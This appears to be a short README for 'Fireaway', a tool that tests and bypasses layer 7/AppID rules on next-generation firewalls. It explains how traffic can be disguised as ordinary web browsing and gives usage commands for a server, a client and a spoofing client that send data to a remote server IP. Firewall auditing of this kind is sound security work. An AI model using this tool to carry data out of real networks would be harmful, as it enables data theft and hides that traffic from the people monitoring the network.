Fireaway is a tool for auditing, bypassing, and exfiltrating data against layer 7/AppID inspection rules on next generation firewalls. These tactics are based on the principle of having to allow connections to establish through the NGFW in order to see layer 7 data to filter, as well as spoofing applications to hide communication channels inside the firewall logs as normal user traffic, such as Internet surfing.
python fa_server.py <port to listen on>
Got the same or lower amount of data on two consecutive runs. If sending test data, maximum data leak size may have been reached.
python fa_client.py <FireAway server IP> <Fireaway Server Port> <Client mode (0 or 1)>
python fa_spoof.py <FireAway Server IP> <Fireaway Server Port> <Client mode (0 or 1)>